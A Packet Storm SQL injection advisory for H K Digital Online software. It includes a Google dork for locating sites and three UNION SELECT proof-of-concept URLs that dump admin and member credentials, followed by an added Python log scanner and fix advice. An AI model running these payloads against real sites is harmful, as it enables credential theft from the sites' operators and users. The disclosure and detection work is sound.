H K Digital Online SQL Injection

2014-02-16T00:00:00
ID PACKETSTORM:125237
Type packetstorm
Reporter th3rockst3r
Modified 2014-02-16T00:00:00

Description

                                        
                                            `# Exploit Author:Th3 R0cksT3r  
# Exploit Title: H K Digital Online SQL Injection  
# Date: 15.02.2014  
# Email: th3rockst3r@gmail.com   
# Vendor Homepage: http://www.hkdigitalonline.com/  
# Facebook: Facebook.com/thee.rocksTer  
# Google Dork: inurl:".php?id=" intext:"Powered by H K Digital Online."  
  
  
  
  
=== Material's Description ===  
An attacker can get database info by this vulnerablity.  
  
  
  
Proof Of Concept:  
  
  
1. http://localhost/tender_notice.php?id=-23%27+UNION+SELECT+1,2,3,group_concat%28userid,0x3a,password,0x3a,mainadmin%29,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+from+admininfo--+  
  
2. http://localhost/blog-inner.php?id=-3%27+UNION+SELECT+1,2,3,4,group_concat%28userid,0x3a,password,0x3a,email%29,6,7,8,9,10,11,12+from+admininfo--+  
  
3. http://localhost/storelocator.php?id=-574+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,group_concat%28login,0x3a,passwd,0x3a,email%29,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37+from+members--  
  
  
  
  
# Greetz:Back Bone,Illûmïnåté Ðëmøñ,Orions Hunter,Dark Knight Sparda,Gh0st KilL3r,Luge Racer,Code Breaker,Darklord,Devil Prince,Rakhal Beduin,Bakeer Bhai,R007 C0D3,Dipto,8l@ck 3xplor3r,  
Sparrow,Bd Matrix,Cyber Blader,BD BLACK HAT and All Bangladeshi Hackers  
`
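All three proof-of-concept requests above share one shape: a numeric `id` parameter that arrives carrying a closing quote, a `UNION SELECT`, and a `--` comment terminator. That shape is what a defender can look for in web server logs while the application is being fixed. The following is an added example, not part of the Packet Storm advisory or of the vendor's code: a small Python scanner that parses combined-format access log lines, URL-decodes each query parameter the way the web server and PHP would, and flags requests whose `id` value is not an integer or contains UNION-based injection markers. The log lines are constructed for this example (the second and fourth reuse the advisory's own request shape, shortened), and the assumption that `id` should always be an integer is the example's, not the page's.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample log lines in combined-log shape (not taken from any real server).
# Lines 2 and 4 mirror the shape of the advisory's proof-of-concept requests.
SAMPLE_LOG = """\
203.0.113.5 - - [15/Feb/2014:10:01:12 +0000] "GET /tender_notice.php?id=23 HTTP/1.1" 200 5120
203.0.113.5 - - [15/Feb/2014:10:01:40 +0000] "GET /tender_notice.php?id=-23%27+UNION+SELECT+1,2,3,group_concat%28userid,0x3a,password%29,5+from+admininfo--+ HTTP/1.1" 200 5380
203.0.113.9 - - [15/Feb/2014:10:02:03 +0000] "GET /blog-inner.php?id=3 HTTP/1.1" 200 2210
203.0.113.9 - - [15/Feb/2014:10:02:30 +0000] "GET /storelocator.php?id=-574+UNION+SELECT+1,2,3 HTTP/1.1" 500 412
198.51.100.7 - - [15/Feb/2014:10:03:00 +0000] "GET /blog-inner.php?id=abc HTTP/1.1" 404 190
"""

# Assumption for this example: these query parameters are integer row ids in the application.
INTEGER_PARAMS = {"id"}

# Combined log format: ip ident user [timestamp] "METHOD target PROTO" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# "union select" or "union all select", tolerating whitespace or /**/ between the keywords.
UNION_RE = re.compile(r"\bunion\b[\s/*]+(?:all\s+)?\bselect\b", re.IGNORECASE)
# SQL comment terminators used to discard the rest of the original query.
COMMENT_TERMINATOR_RE = re.compile(r"(?:--\s|--$|#|/\*)")


def classify_request(target):
    """Return the reasons a request target looks like a SQL injection attempt.

    parse_qs performs the URL decoding ("%27" -> "'", "+" -> " "), so the checks
    run on the value the application would actually see. Empty list means clean.
    """
    reasons = []
    query = urlsplit(target).query
    for name, values in parse_qs(query, keep_blank_values=True).items():
        for value in values:
            if name in INTEGER_PARAMS and not re.fullmatch(r"-?\d+", value):
                reasons.append(f"{name}: non-integer value for integer parameter")
            if UNION_RE.search(value):
                reasons.append(f"{name}: UNION SELECT in value")
            if "'" in value and COMMENT_TERMINATOR_RE.search(value):
                reasons.append(f"{name}: quote with comment terminator")
    return reasons


def scan_log(text):
    """Parse each log line and return the flagged requests with their reasons."""
    hits = []
    for line in text.splitlines():
        match = LOG_RE.match(line)
        if not match:
            continue  # malformed line; a production scanner would count these
        reasons = classify_request(match["target"])
        if reasons:
            hits.append({
                "ip": match["ip"],
                "timestamp": match["ts"],
                "target": match["target"],
                "status": int(match["status"]),
                "reasons": reasons,
            })
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit["ip"], hit["status"], hit["target"].split("?")[0], "; ".join(hit["reasons"]))
```

Two points worth noting. The first, non-integer check is the most useful one: it catches the injection regardless of keyword obfuscation, because an integer id simply has no business containing anything but digits, and it flags `id=abc` as a probe even though that request is harmless. Second, the HTTP status is recorded but not used to decide: the advisory's requests return 200 because the `UNION` succeeds, so a detector that only alerts on 500s would miss exactly the successful extraction. On the application side the same observation gives the fix: cast `id` to an integer (or bind it as an integer parameter in a prepared statement) before it reaches the query, and none of these payloads survive.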